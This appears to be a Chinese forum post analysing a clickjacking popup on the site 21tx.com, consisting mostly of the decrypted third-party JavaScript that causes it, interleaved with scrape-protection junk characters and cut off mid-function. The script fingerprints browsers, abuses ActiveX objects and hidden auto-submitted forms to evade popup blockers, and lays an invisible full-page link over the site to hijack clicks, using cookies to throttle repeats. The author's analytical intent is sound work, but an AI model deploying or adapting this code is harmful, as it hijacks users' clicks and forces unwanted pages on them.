|
|
天星网ClickJacking点击劫持分析6 C" |! J' t) H8 _5 @" [
http://www.21tx.com/ 天星网
4 o& i+ l2 }) x我得联系联系作者
j$ J% {$ t# A& v: n6 K, z A刚好打开这个站,发现第一次点击会弹窗,然后就不会,清除下COOKIE,又继续了,然后查看源代码,也没什么奇葩的。
& }9 ?! @' u0 l$ \! D8 t. Thttp://www.lxting.com/script/popup/v1_min.js' x' F9 q6 w3 s* R* c; x. n% [
2 r( C3 G; A6 o1 u2 l" ]9 x
这个是锁定到底JS脚本,9 |: r! A0 d. w$ A) X2 E0 [
解密后的代码- (function() {
( ^5 e8 s2 m1 M" P! h1 i$ g - var aa_url = window.ytpp_url;
* Y$ j2 @; |5 \( b( f$ k - var ua = navigator.userAgent;
0 Q& X* e; C* d& h) s3 U$ I5 C6 \$ q - var form_div = document.createElement('div');
0 U/ y2 w0 t0 o - var form_pd = 0;
+ A/ T- ^* s+ \ - var browser = {
) J) K9 B: @1 i* u - ie: /msie/i.test(ua),
, P, r3 s' L$ s9 p5 E0 l0 r - ie6: /msie 6/i.test(ua),
4 ?1 ?# v+ S5 W. L$ }1 R! I4 I - ie7: /msie 7/i.test(ua), # Y- A/ I6 ~4 v! l& `+ b
- ie8: /msie 8/i.test(ua), , K( w! f9 r4 g9 l1 k2 {# P
- ie9: /msie 9/i.test(ua), 7 f' p; i9 ~5 d0 ~/ V
- 360 : /360se/i.test(ua), 9 k6 ^) r+ l( P# _3 H1 [
- sogou: /;?se.+?MetaSr/i.test(ua),
) [6 I5 q7 u4 ~8 h - maxthon: /Maxthon/i.test(ua),
" u1 C- h- i: L$ [- h - tt: /TencentTraveler/i.test(ua),
3 b) i) K$ z/ O - ff: /firefox/i.test(ua), 8 p$ f ~' P3 i8 F& d% \) t) b
- webkit: /AppleWebKit/i.test(ua),
, Z, t7 t# O8 N( M- u5 b - opera: /Opera/i.test(ua),
0 b! o/ A8 ~- w. \" u* Y2 j - qqbrowser: /QQBrowser/i.test(ua),
; P" F: i9 q' p( z7 ~3 Z8 T - cr: /chrome/i.test(ua), & u! o' e$ [9 B3 C m
- gg: window.chrome, 6 `0 t! x Z; `7 P# E! D
- theworld: /Theworld/i.test(ua)
5 g4 M" A1 B3 T) I; }8 ^' S3 A% U* ^ - };
5 P: |& e$ G, V7 S" W* P - var _setting = "";
% T6 _3 |# a1 H - var _ct = 0; 7 f9 h7 N4 _ N, R
- var _le = 0; & n- |8 r; e. t# X
- var _pd = 1; 5 o3 Q+ F) _2 W" B
- var _pd2 = 0;
' Y j$ a3 V$ B - var _pc = 1;
! c4 M& J# Q# h; b. D4 z C - var _pc2 = 1; # D- o% Z5 J9 X* x- p P% v4 ]
- var _pco = 0; m" b1 `! M6 G9 @ ]
- var _pta = 0;
2 P' C L. N. I& ^. y- D - var _ptb = 0; 4 y4 X, a; r- v$ X0 C; z0 U2 v0 n
- var _pt2a = 0;
4 Y) u, ^3 z5 b5 o& N7 _: f - var _pt2b = 0;
+ |9 V" k8 @2 S' C1 o - var _pt3a = 0; h, r' A2 Q# Q2 O
- var _pt3b = 0; 8 V+ `! O* a1 m* W7 [
- var _pt4a = 0;
6 b7 ^. F* R" L7 c* E0 U0 S - var _pt4b = 0; ' |# Q2 l/ D7 t: v% l' X
- var _pt5a = 0; ( ]1 ^. Q1 D% g9 ]( {
- var _pt5b = 0;
7 B+ ^ C7 c9 S- M& z9 R) l - var _pt6a = 0; 5 n+ G! T+ S1 j* P
- var _pt6b = 0;
T) C% ]6 f9 F* E% I9 R8 p - var _pt7a = 0;
6 y( m+ `( k; F4 ^7 x+ ?6 p - var _pt7b = 0; - s6 `! g# w, E
- var _pt8a = 0; * H% w# G0 S6 ]
- var _pt8b = 0; - i' {6 S8 K4 p" z% _+ s
- var _pt9a = 0; 5 {; d9 N- u2 a! }: H2 w
- var _pt9b = 0;
& {- t, M$ e3 T, _8 x - var _pt10a = 0; ! o. i6 ~# s! Y$ F4 q; i9 E
- var _pt10b = 0; 2 f9 R0 {* U2 v4 t4 g4 d
- var _po = 0;
& D2 J9 ?3 z4 x% { - var _poo = 0;
. h- j* T: @6 I! Q8 x - var ckn, ckt; ; z+ c" |0 H% x6 I
- var ads = 0; - \6 E" P: _' g; v3 L) C- r
- function b(w) { 0 I4 B7 c# u7 m$ g1 A
- var s = w + "="; ' N' \* G' L. T: I
- var r = "";
! W* U# O7 s8 F: o) E - var o = 0; % P2 [7 o5 s/ m
- var d = 0;
1 f& T" G7 [9 y" b* L6 Q - var p = document.cookie; ) `1 U2 j$ C2 Q9 W c
- if (document.cookie.length > 0) { ( C i* L6 o/ t7 l- `; t
- o = document.cookie.indexOf(s); : t" y# |! |/ `1 c; {- U
- if (o != -1) {
0 R; v6 ~4 R9 ]7 ` - o += s.length;
8 [9 Q/ E1 Z2 o7 G: { @ h$ q) c - d = document.cookie.indexOf(";", o); ) w! F+ h$ s' o3 m( p* V6 b/ h% ?
- if (d == -1) d = document.cookie.length; + W) c- b1 l) H
- r = unescape(document.cookie.substring(o, d)) 1 d% x I+ I$ e0 k
- } * i! F# a" I' }& q- ^1 v5 I& h H
- }
" g8 V: k1 [7 n' b - return r
2 T3 q5 M& `+ y/ B6 H - };
: a; R% U6 n6 d2 o1 J4 i - function p(w, p, v) {
k' p- A! Z/ m0 _8 ?# ~; W5 D - var t = 30;
& v1 R) Y& l$ j% h; W! f - try {
" q: p6 s% H$ @! i8 X5 M1 x/ z - t = parseFloat(p) * 1
; _' r6 g/ L" w' ]. }1 Y6 A - } catch(e) { " R! a! B& z# f3 |9 b& | O- Q9 f
- t = 30 + V7 }% E% o: Q4 L& ]
- }
5 m3 d8 X1 E2 _ - if (isNaN(t)) t = 30;
) P$ f) Y5 ]! L5 K9 L. ]) S - var then = new Date();
1 M# B, w. a% `4 j* h - then.setTime(then.getTime() + t * 60 * 1000);
; C( d$ j* v( v$ x, G - document.cookie = w + '=' + v + ';expires=' + then.toGMTString() + ';path=/;'
1 u/ j$ s2 c; c- a/ Q1 F2 [ - }; $ \/ [) F( i6 G! f @
- function init() {
$ F; ^1 B/ c: L5 y; x3 T6 b& t - _setting = ytpp_sti; 0 u+ M7 ? {: P! r" ?
- if (getp(_setting, "CT")) { 8 K0 \' `4 _' b& H
- _ct = getp(_setting, "CT") & _9 n; a/ e# I# }9 A O1 {
- } / C! T5 t o' P8 O2 Q
- if (getp(_setting, "LE")) {
! G7 ?% g+ ]1 ?" {! Q - _le = getp(_setting, "LE") 2 P9 v9 W, \2 J) s; h* l1 [
- } + ^" k% [- w1 h8 K. A9 W
- if (getp(_setting, "PD2")) {
0 v* B7 A& [/ V, x - _pd2 = getp(_setting, "PD2")
3 X+ o& F3 d# ?( S0 t) } - } & W, |4 ]: ?, Y$ M
- if (getp(_setting, "PC2")) {
" l" ^& J( g! `8 |5 I% |8 Y - _pc2 = getp(_setting, "PC2") ( E& L( ~3 n$ l+ J1 h) G- q
- }
, ]2 g/ U; ~; B/ \ a2 t9 h( J - if (getp(_setting, "PCO")) { 1 b% v2 T' C2 x: y$ C% y/ S' a
- _pco = getp(_setting, "PCO") + x5 o$ M8 {) |- t
- }
B2 s; m0 N* N6 @: F - for (var i = 1; i <= 10; i++) { 7 U# F" P9 q5 d9 s( U
- var n = i == 1 ? "": i; 1 A4 l. d5 n' G( A$ p S1 z' l
- if (getp(_setting, "PT" + n)) {
! `' }6 o! M5 O8 o - eval("var _pt" + n + " = getp(_setting, 'PT" + n + "').split(',');"); : H! w' D* T4 f1 V- L1 d% J
- eval("_pt" + n + "a = _pt" + n + "[0];"); 0 d B0 k/ _" Y u l3 Y- i# S) a
- eval("_pt" + n + "b = _pt" + n + "[1];")
4 ^( b3 X9 w$ k& X( c - }
! |( h% z2 O6 [ - }
, p8 H5 W0 k; ]( C - if (getp(_setting, "PO")) { 6 Q$ A5 F4 m4 H: i6 A
- _po = getp(_setting, "PO") $ f$ ]* u$ |+ J* T- N# G
- } 0 v* Z3 a2 S: h( j
- if (getp(_setting, "POO")) {
4 `2 U" }; L: Z M: X* [/ I - _poo = getp(_setting, "POO") ! o' y) }9 p- y
- }
- r/ a8 b7 x H/ ^' A - if (_pco == 1 || _poo == 1) {
p& S# j$ e2 t7 a - if (_poo == 1) {
; |! Y! }' ~. ] {$ w+ M4 b - _pco = 0
3 ]5 y0 F' K7 T5 |. v8 [ - } else {
; T7 c8 u( @1 u( [ - _poo = 0
0 ]+ E6 W& G! q$ ` - }
5 {3 M( c6 ?' y @3 q - _pd = _pd2 = _pc = _pc2 = _po = _pta = _ptb = 0; \. o9 N; _8 k; K+ Z+ d7 Q
- for (var i = 2; i <= 10; i++) {
+ w$ _5 I! q2 `# V! I4 i9 E8 P& ~5 K - eval("_pt" + i + "a = _pt" + i + "b = 0;") / r9 A2 @% e8 X# S$ j* r
- }
5 |& v1 D+ u$ g0 | - } 5 c/ j' Q) H6 y# m" O
- }; : Q; o" A F" o4 Q$ `- b
- function getp(s, p) {
7 m3 c9 B5 |! o6 w/ O' v" r! n - var i = s.indexOf(p + ":"); 3 q( R, Z! O/ o. ^; Q4 e, N+ V
- if (i >= 0) { 4 W4 x1 N" v+ t4 w# p
- return s.substr(i + p.length + 1, s.substr(i).indexOf(";") - p.length - 1) 1 _3 m' X# [ G( F, P* D$ v, F
- }
" }8 m' \* F" ?0 f2 r- S - };
- f. ]2 |3 g2 u2 `; N/ A0 Z* w - function event(e, event, func, act) {
+ {3 R" x$ O D1 w2 ?* ] - if (browser.ie) e[act === undefined ? 'attachEvent': 'detachEvent']('on' + event, func);
% x% L- v6 q1 ]( s. ? - else e[act === undefined ? 'addEventListener': 'removeEventListener'](event, func, false) ! A6 E* }( Q: e c+ A* F
- } 7 e% @2 r2 m) b! D- Z* `- ]
- function pop(url, param) {
. l4 H% Z+ K6 D3 Q - if (!document.body) { 0 h/ @; e* C5 f
- return setTimeout(function() {
: d* l5 A" r% N% m - pop(url, param) : a7 N* t$ H1 j
- },
% e" X; {0 t" `0 K" G+ S6 w$ v - 13) 1 p" p' q; J; @8 I
- } 4 c+ \5 r& E) h' e. {4 m* c" p0 d
- try { 1 o9 ]+ w9 y6 c) |3 P g& w
- if (browser['cr'] && browser['gg']) {
: o4 L6 ~$ A* J/ O - try {
$ V, D7 z8 v. H0 ^: d' n- {. |$ @ - hrefopen(url) ( s5 D$ N* f3 H& C e) H
- } catch(e) { 2 M) m" s1 e {# F2 w% Q
- a_pop(url)
U I4 s' l! K$ f# s5 I7 y - }
4 Q$ f8 C1 E: l - } else if (browser['webkit'] && browser['maxthon']) {
* J; n1 v# [; v) N - if (!func(url)) {
; {. i; I6 w' t" L3 A8 C0 h - try { ' k2 t6 U3 `; w6 g
- form_pop(url); 6 o7 G4 S2 ]2 ]) [# V0 |' v1 K
- a_pop(url) ) B/ M9 j" s9 G1 u1 c. ^
- } catch(e) {}
$ A" X3 r0 \. z$ P( e- O7 q - }
2 N2 }5 f% B& H) z! I - } else if (browser['tt']) { $ G% H5 {; K. _6 k4 I' N
- try { , ~8 Q1 \8 T" X! |; ? N0 V
- object_pop(url) / {) @$ `( m2 I- n0 T O7 X
- } catch(e) {
k8 p/ J" x. Q9 _ - a_pop(url) 9 I$ P+ B% H0 x5 o! D4 E
- }
# i1 t! d1 D" B8 a6 ^! u {7 K - } else if (browser['sogou']) { 3 u# N) H A( \ y5 S$ z! L& N
- if (!func(url)) {
! }$ a) s1 f9 y$ w; k" X - try {
+ t2 v$ V: p. M) ]! S% D - a_pop(url) 0 L q, y \9 a" J' d
- } catch(e) {} T0 U! A [3 z& N8 J
- } ) {1 X2 x" s7 @, s, ?+ o
- } else if (browser['webkit'] && browser['qqbrowser']) {
; ]% I7 i6 e4 W- ]* m5 \7 } - if (!func(url)) { ' u6 u/ L: ]4 k4 q; X0 @: T
- try {
5 `1 B( l4 Z' e9 e. h - form_pop(url)
7 _9 Q) a6 [2 ~8 N - } catch(e) {
1 L/ b6 z% ]7 A# G: V! z0 F, e - click_pop(url) * j& a% X4 `$ K0 x9 C- {8 ]
- }
- ?, C1 X9 J* X: B5 `! s& ^ - }
3 b$ ?+ X3 O7 G! J2 K3 P" ] - } else if (browser['webkit'] || browser['opera']) {
8 U9 @4 R0 }4 ~9 V4 N% l - try { 7 v6 T3 o0 t) q% y4 Y& D$ ?& E V
- form_pop(url);
* J' y' ], i. O0 T/ I5 L* e - a_pop(url) & Q; I" ^4 e6 R
- } catch(e) {}
* B7 r3 g# q# e, k - } else if (browser['theworld'] && browser.ie6) {
# h0 C9 F# ^# R0 V5 L6 } - if (!object_pop2(url)) { * v9 ?5 O) Y# I) p& U0 `( C
- a_pop(url) * ]0 ]) O: X8 m1 q7 [+ N- L9 h) E
- }
3 l2 q# K# F/ r - } else if (browser['theworld'] && browser.ie8) { 9 S- E( O6 K2 O6 L
- if (!func(url)) { + h' d4 g5 K* B/ D8 m+ B
- try { Z1 l3 Y- m0 s$ z2 L0 O; d
- object_pop(url)
- @& n: t; ~# g" R3 L - } catch(e) {
6 ]# A; B+ g3 _& H; h - click_pop(url) ) q8 ]& l# j9 v
- } : J3 K; t0 P9 ?8 r% [6 x. T e
- } 6 _8 V$ ?1 m2 U
- } else if (browser.ie6) {
7 H% _8 T6 D8 U& U - if (!func(url)) {
7 |6 |& q" f2 H- {0 ?3 D - object_pop2(url) 5 q8 g q1 C8 C- a* g2 x" B9 p; u
- } 2 X8 q% G6 ]* f7 j1 Y# k8 r
- } else if (browser.ie8) {
' j7 | L. u$ b7 P/ W - if (!func(url)) { 4 ^( U2 L9 `' T2 p
- try {
' A/ L' M% A0 ^# S6 J - object_pop(url)
! E: b$ r5 @( _2 y- p6 M - } catch(e) { 4 e1 P% p4 e4 o! T/ d( ~
- document.onclick = function() { ) e6 j4 q3 v# z* y+ w
- func(url); 4 j V' U0 Q1 `: m
- document.onclick = null
1 {; v8 O0 ~. } F6 s, u - }
2 f7 z2 k/ z/ [" v* `% l - } # z$ P) Q7 `( N2 ~
- } 8 O2 i6 `- y, o' f R5 T( U" F
- } else if (browser['ie']) { $ P7 E$ A) u: [& T$ ~
- try { - Y) @& w3 ?& T: a/ V: _8 E- M
- object_pop(url) # h4 \) e1 g- q2 v# j3 u+ n2 n
- } catch(e) { 8 {' j4 E" n* _0 }) k
- click_pop(url)
# g1 V" }" z- a3 U( n - } 3 F1 S. |9 S9 N- ]3 p
- } else if (browser['ff']) { # [, w6 f0 Q& R1 u. D. i
- if (!func(url)) { 9 ]6 { v2 g" `0 p F
- click_pop(url) $ P- g X7 E" N! Z) O9 \
- }
& W, }$ B9 l' S' Z8 N - } else { 5 G3 X9 y2 B. Z8 F8 Y
- if (!func(url)) { 6 f5 B, z: V2 p3 E' d; m
- click_pop(url)
! u! B, u' X' W. ~ - }
# x) i- p. O0 p* z, D% _ - }
1 N& c& M2 a* Z" w9 ? - } catch(e) { " M* F0 d7 d2 `9 d' j# ~# p
- if (browser.ie7 || browser.ie8 || browser.ie9 || browser['qqbrowser']) { 8 L7 K" f+ U4 L6 `
- click_pop(url)
" B5 d. k' U* o) ~ h' a+ j6 J" M - } else { : R: z, d4 x5 k) L* t. z
- a_pop(url)
q% Y7 Z' @8 z* k1 U1 u, J - } ! u" ^! _1 x5 U) |( s% t; z3 h
- } % s. i& Z2 H2 {7 C
- }
4 ~6 x6 B. K7 E* {0 s - function object_pop(url, param) {
( U* H* r* U. L8 g - var object = document.createElement('object');
0 j6 b3 U% W7 f1 ]/ y& i - object.setAttribute('classid', 'CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6'); - ? i9 N1 @2 \9 a6 \7 c/ T+ l0 T
- object.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;'; ! W" H4 a$ W" |
- append(object); ( h u1 W+ H6 h9 P" G) B. L3 h
- object.launchURL(url);
5 _3 m+ d' G u0 ~2 \$ g - ads++;
/ Q a0 N3 D0 }8 I/ s# j3 C - p(ckn, ckt, ads)
7 C7 f4 M+ I) g/ F: Y - }
" R* T8 ^' X3 {1 w; x+ I - function object_pop2(url, param) {
& ^, r: `, a+ a0 h4 c F6 L5 t/ V - var object2 = document.createElement('object'); . N% z# @' K3 @3 Z( J2 d
- object2.setAttribute('classid', 'clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A');
% E: _1 T8 C& X - object2.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;';
) W/ V- |: r1 F% U - append(object2);
1 G+ s9 g% u* y6 ~( J - for (var i in object2) { , S) o" H: `' p8 z
- try { (function(o) {})(object2[i])
+ ]+ f$ O& ~1 K( B! Y* x - } catch(e) {}
* P; Z; G' Q5 G( Z- n - }
/ D5 c5 c' T; ]/ u! C - setTimeout(function() { ; t7 M4 ]3 h. B! d& M# T! G6 l+ l
- object2.DOM.Script.open(url, '_blank', '') & B5 f% n9 j7 I5 j2 l" n
- },
: N* `3 j6 T, n7 Z% ` - 500);
0 H! }0 i, g* J; G( M A - ads++; + F; X2 s, Y6 m
- p(ckn, ckt, ads) / ]. ^ {+ q" d
- } 7 i S0 O1 T t8 J" H% D' J
- function append(e) {
5 D. _3 A9 h) M: j* ? - for (var t in { ; h6 H4 K. C$ J: Y1 L7 G$ X" ?( ]
- body: 1 ( A& u' |7 s2 {9 Y( H/ ^; w
- }) { # f6 v( G( S# l) O# `
- var ele = document.getElementsByTagName(t);
" F: ~9 T& y# P - for (var i = 0; i < ele.length; i++) {
) i3 @9 H* Q* J - ele[i].insertBefore(e, ele[i].firstChild); / U3 ^# l0 |" I9 f2 q( U0 {
- return
- Y' U3 d- h; i8 `4 j - }
* Z# X" N: A& h/ T _ - } 3 T% c+ h0 n; @$ A" r5 R
- }
% v9 Y$ w- x4 ~, Z( G - function hrefopen(url) { c4 z3 ]3 a+ N5 w6 l
- try {
6 |( ^- P8 X' ?( R5 q5 @* r - var c = document.createElement("a"); $ W3 k! r% e/ n! \6 u2 }0 i [
- c.setAttribute("href", url);
" I) N& @" g* V: d - c.setAttribute("target", "_blank");
) G \5 L' F5 l$ |' I8 i - c.setAttribute("style", "display:none;"); # T3 h* [, U' J. }/ }# K
- var b = document.createEvent("MouseEvents");
; ^, q3 y/ ^9 y/ l9 c1 o6 g7 J( a - b.initMouseEvent("click", false, false, window, 0, 0, 0, 0, 0, true, false, false, false, 0, null); 4 G; a6 U6 Z" T
- c.dispatchEvent(b); 8 n; r( r( d; s$ ?( H3 }3 P! O
- ads++; ) V4 k t0 _; M3 K. I
- p(ckn, ckt, ads);
8 C+ V- m/ ]! p' A3 k3 D - return true/ G8 @2 X1 S* K: {1 d0 k
- } catch(q) { 4 n9 {/ Q8 T; V, K2 A8 r) M
- return false
7 L* [' U2 c8 w/ U8 G, G - }
% G" ~0 q( F* j - }
# c0 q" c' U- v& |$ p - function form_pop(url) { 9 T6 `# m6 u1 l
- form_div.setAttribute('id', '__unionsky_push_d_object_box__');
$ I. g. M+ k0 u L) ]; R; e; X" D - form_div.setAttribute('style', 'display:none'); 2 c* Z [/ R R) `
- var form = document.createElement('form'); . [2 s8 j% l* Y/ @6 N" x$ Q
- form.setAttribute('action', aa_url); # A1 O O# k8 K5 r0 X
- form.setAttribute('method', 'post'); 1 R& _( J6 h8 u* ]+ s3 u- P' u7 K: C
- form.setAttribute('name', '__unionsky_push_d_form_box__'); 5 C* V' l/ F6 R' J
- form.setAttribute('target', '_blank');
1 f) w/ D" A% \) }& R! k6 T1 C, @7 _ - form.setAttribute('style', 'display:none');
5 t$ c5 _- q: ]' m- D7 b - var sinput = document.createElement('input'); # L: i0 E# l* K/ ]; l
- sinput.setAttribute('style', 'display:none');
& K; o' d) [& Q" X) H; \' M - sinput.setAttribute('type', 'submit'); 4 ~& f" M5 r2 L |/ a2 i
- sinput.setAttribute('id', '_sumit_2app'); J8 i4 ]# Y& ~) u6 A' v _# ~
- form.appendChild(sinput);
% o& { z$ G% _+ {3 g9 L - form_div.appendChild(form); 8 `! v9 i8 p" l2 U4 m' V
- append(form_div); Z2 T7 M- X% J5 ^, j
- var unionsky_from = document.forms["__unionsky_push_d_form_box__"]; 8 d* x9 `0 q/ B$ v
- try {
. w. B/ Q( M$ f0 ^& E/ Q - document.getElementById("_sumit_2app").click() 7 a% E0 E/ T. ]$ O, i3 y
- } catch(e) { 2 ^1 Q. k9 ~; [% `7 E3 m
- event(document, 'keyup', 7 p5 @, D2 a7 D' T! [4 R
- function(e) { * X! H! r( w3 z c. u6 ?$ ^% r
- if (document.getElementById('__unionsky_push_d_object_box__') == null) { % B- b. H% l- j* @
- return
8 J6 Z/ {& O% T8 R0 Q+ ^) G B1 O2 R - };
5 |5 C2 ]- m7 l/ B. E( P. E; S4 ] - e = e || window.event; 3 P! |+ z7 d9 M# ~; B4 {. x4 x8 o
- e.canceBubble = true;
$ h" Q* }0 y$ D - event(document, 'keyup', arguments.callee, true); 3 |+ E6 q: [- @
- form_pd = 1; 4 x. y' ?9 Y' F1 C4 \
- unionsky_from.submit() 7 f- ?# c9 w( L) z; `* f8 N: ^
- }) * ^$ G7 o: a. F+ _( f4 B: e$ t
- } 1 ^9 ~1 x( ~" }0 {3 v
- }; 8 @ p2 l! y3 t, {
- function click_pop(url, param) {
* i& V/ J' m8 j- N2 ] - event(document, 'mouseup',
4 W; n& r# b( z - function(e) { & _: W, c# d$ f
- e = e || window.event; " n0 I, ?" D( u- m u0 a
- e.canceBubble = true; ' T. R, j2 r! U$ L7 [3 _
- event(document, 'mouseup', arguments.callee, true);
" z& J6 U% |1 D5 ~4 [" H5 p - func(url, param); ) K( H8 w- b. ^/ m) C; [9 b
- ads++; ; `: [3 R; B$ }7 w8 k7 o
- p(ckn, ckt, ads)
% a1 x+ _( K2 j6 w - })
0 z, D ?" [% H - };
4 e0 R: F" O3 U& K1 y0 C - function a_pop(url) {
* Q( g( X7 j* V u3 E. Q - if (ytpp_plid == 166028) { 2 t! j$ O" U8 y: j1 O4 ?
- return
2 x9 U: U: v5 G - }
6 k- p1 R& f/ Q - if (!document.body) { : p5 |) F: \: K. X8 L. l5 v+ g
- return setTimeout(function() {
, c: d2 f& ^* P9 y6 A/ }, d - a_pop(url) 6 c) s8 Z3 y& A- r! g
- },
( Q0 |. x" T1 i* k% n - 13)
6 p, ]4 H0 [; g - }
/ w) e( x) W. }; ~# k4 t - var a = document.createElement("a");
; p' J" g' s7 B+ k - a.href = url; 5 r+ ^3 o3 D2 R/ n% F8 A
- a.target = "_blank";
5 Q' ?& }# u3 j7 ]+ a - var div = document.createElement('div');
T& h$ C6 o8 l' l7 u- M7 ~) j - div.style.backgroundColor = '#fff';
5 Q, Z% O# @# m6 o- U2 m - a.appendChild(div); + ?) L6 J' y7 e B/ _$ r
- append(a); $ B" H) U& n) O" ]2 G; S. ^ Z
- var as = a.style;
* T3 _+ A M3 l; c. O0 h& [ - as.position = "absolute";
# f { l/ X5 N6 b9 [/ i; F - as.zIndex = '2147483647';
6 w4 P* p1 m8 ^% c. |" i6 y. q# S - as.display = "block";
- ?4 i4 i, M3 i2 a& Y: J - as.top = "0px"; * p- Y; x9 Q+ s* t
- as.left = "0px";
. D+ A8 D8 f: J' f+ L - as.cursor = 'default';
2 x: B7 Q2 U8 a: j - as.opacity = "0";
) a1 \) o1 w5 Y7 f - as.filter = "alpha(opacity:0)";
A" F1 {; Z! C1 u6 q/ K - var m = setInterval(function() {
2 q5 U7 K& P) P, T - if (form_pd == 1) {
/ A7 B+ t$ J+ p - a.parentNode.removeChild(a); 3 ~3 t/ L( U% K- g' L1 B
- clearInterval(m);
2 p( z9 a2 ~5 w - return
1 `9 _8 [; N" ` - }
+ l5 F4 r1 Q R) T' K9 _ - a.style.zIndex = '2147483647';
' C4 n; C, W( B" e: B* U$ N - var d = (document.compatMode.toLowerCase() == 'css1compat') ? document.documentElement: document.body; + _) G' Q5 C! W- b4 D" F
- a.style.top = Math.max(document.documentElement.scrollTop, document.body.scrollTop) + 'px';
9 @% a6 s6 i/ Z0 d - div.style.width = Math.min(d.clientWidth, d.scrollWidth) + 'px'; , t' r5 L" K4 y& ]5 ~* F$ I
- div.style.height = d.clientHeight + 'px';
, A2 ~1 Q4 ?$ N+ ^0 M& W* j - if (browser['ie']) {
0 |8 A5 U; j& Z" `* ^ - try {
" x( w' s" \6 c4 N* u: Q - var divs = document.body.childNodes; 9 B5 s1 `( c- O# m. r
- for (var i = 0; i < divs.length; i++) {
( d7 g- ^8 O2 q) G - if (!divs[i]['style']) {
* H# g/ G2 A+ j! N' f+ M$ b - continue% F2 l' p3 q/ s" `/ J
- }
8 B* t( e; {, U" \& `* } - var _i = parseInt(divs[i].style.zIndex);
& \2 @$ x; Y3 U3 X' g% U; o - if (_i && divs[i] != a && _i == 2147483647) {
# J) ^( P j* t+ L/ i% ?% q - divs[i].style.zIndex = _i - 1
8 ]6 y( t; j/ G7 u. O - }
8 [1 c3 r! i" u; F# ^" d/ y - }
6 Q* `" ?8 O1 y6 o; [7 S. u - a.style.zIndex = '2147483647') f' I8 T! r6 z& V
- } catch(e) {}
: W/ y9 l3 ~; Z9 z - }
/ _; ~7 M& s, a& M - }, + e+ y8 D* \, P
- 120); ; ^8 B. f; |0 y4 L6 b; e& i
- a.onclick = function(e) {
V7 Y7 D& y7 k" ^, M& w - if (document.getElementById('__unionsky_push_d_object_box__') != null) {
1 e% G7 `/ s* w3 u7 I - form_div.parentNode.removeChild(form_div)
5 E& w4 ? H. M- Z6 r( z - } 0 ?* M$ J* e5 V9 ]: C% b" I+ O
- e = e || window.event; 6 D4 `4 a0 b8 F/ m4 e" [2 s% D
- e.cancelBubble = true;
$ p8 p4 p3 W5 Y& U1 P& M - setTimeout(function() { ; c5 g3 ^, [0 Y3 n6 t9 Y
- a.parentNode.removeChild(a)
% [% g& H( t+ M2 R7 S' [' ^: @ - },
9 ^3 e! G" Y% P( B9 w3 n - 200);
( O* F6 I |$ ? - clearInterval(m);
; d+ Q1 I( A( {( x2 g. I8 s) C - ads++;
" ~6 o( A8 S+ P* h9 F+ D7 a8 a - p(ckn, ckt, ads) 1 H+ _# T& _7 f) g8 M
- };
$ i: _& u' ?% z( f9 P* f - event(a, 'mouseup', ' A6 @; n6 T6 y: j. U. L
- function(e) { 0 O+ z- x7 s* w9 n C
- e = e || window.event; + I* B8 t5 L$ E, O/ }( `0 S, n
- e.cancelBubble = true
# p% S2 J# V' h; x( ?: u/ H - }) - u y, [! G7 r4 X
- }
+ I# J3 k/ i/ E6 {7 H! j - function func(url, param) {
- y+ e- g0 n% ` - var f = window[String.fromCharCode(111, 112, 101, 110)]; $ u1 Z6 }" {+ v8 ]$ }
- var w = f(url, '_blank', 'left=0,top=0,toolbar=yes,location=yes,status=yes,menubar=yes,scrollbars=yes,resizable=yes,width=' + screen.width + ',height=' + screen.height); + W) R5 x/ {/ ~% Q' L$ o9 w2 B
- if (w) {
. M& Y8 g9 G, W* K - ads++;
+ i2 v b4 o) C! [2 ]& X - p(ckn, ckt, ads)
8 X( ^% n2 k- ^8 Y. W$ [ - };
7 |2 D9 f# b4 d8 d1 v8 } - return w
4 [0 j: W; x) {6 \8 V# r - } + p; e& d; I) E8 z: B
- function fstart(url) {
# q& U: P3 C; N, e - init(); $ J( M5 L1 u% k7 q# J
- if (_ct >= 0) { " ~) s; }* V+ l9 ~" `- ~) x
- ckn = "YITIAN_NUM"; 7 i. T. k' d7 F" H
- ckt = _ct
% P1 _/ n6 Y5 v9 [- o* z - } else {
0 [7 x& K N Q6 F - ckn = "YITIAN_ALL"; / c; o: N2 O; ~3 T( w+ c
- ckt = Math.abs(_ct)
$ ]: F. X8 F7 c: Q0 g5 w" w - } / m. x7 T; `% e( J6 f9 n
- if (ckt > 0) {
z" [1 T1 V2 {5 O - if (b(ckn)) { & ?/ [ Z( T% _8 L% I3 _% ?+ b
- try { : J R% R; j8 a" i/ Q. n
- ads = parseFloat(b(ckn))
& ]5 u7 T" f5 l0 J8 S$ v - } catch(q) {} ) ]( E/ B+ e! X4 p+ K& ?5 D/ N
- } 2 ^; v# u% G& R: f
- }
5 y7 D9 ?8 g! z" Z& S4 ] - if ((ads > 0 && ckn == 'YITIAN_ALL') || ads >= ytpp_ads) {
1 s& u; {0 S. U5 M& ` - return
. e, ]# ?6 g- ~6 e" B - } else {
8 R# f8 }/ E1 `. u2 q - if (_le > 0) { 4 i) g. V" Z- M; |
- setTimeout(go(url), _le * 1000) 8 g. J) e0 W" G. D
- } else { 3 l. f A: X' e* {4 B2 f/ [
- go(url) 8 Y" T8 D9 M6 N2 W
- }
6 f# \$ R( |/ j! w - } * x3 K8 V& Z" V6 o9 D. _6 b2 ]
- } " C) u5 @3 h h! Q
- function go(url) {
2 l* r( j5 @' R2 ?/ n - if (_poo == 1) {
/ ~/ B0 B" B# L5 a p4 K' { - try {
V/ b8 N3 o0 k8 Y- Z W1 w - func(url) ) h5 N9 W% c7 A A. T& {5 U
- } catch(q) {}
, ]& z: P9 |$ n+ F! ~, P - } else if (_pco == 1) { $ Q# M: d9 W6 t! H
- a_pop(url)
1 }% `" i8 R; | `# E% ?9 W - } else {
8 v6 O! b% I( ]) N - if (_pd == 1) {
. F( d/ h5 ^& j - setTimeout(function() { 8 \/ q7 m' [/ k
- pop(url, {
' \% f" ]' T. h" n: n4 b$ `8 p; U% ` - a: 1,
* j( `4 U! ~1 P9 E4 B# l; f - b: 2 ; O7 n+ c3 f# G9 u9 H7 L- J" b8 |
- }) 2 k! a A. h% x
- }, " V. P g: ` \
- 300) 8 P$ p J5 G3 {$ a5 I" F& m) r
- } ; X: Y6 R3 @* Z# ~5 {3 k; n) p8 r
- if (_pd2 > Math.random()) {
' y- H; x9 W6 l1 b/ N$ B - setTimeout(function() {
P* w: ?3 D& B/ Y4 n, }' k& U! P - pop(url, {
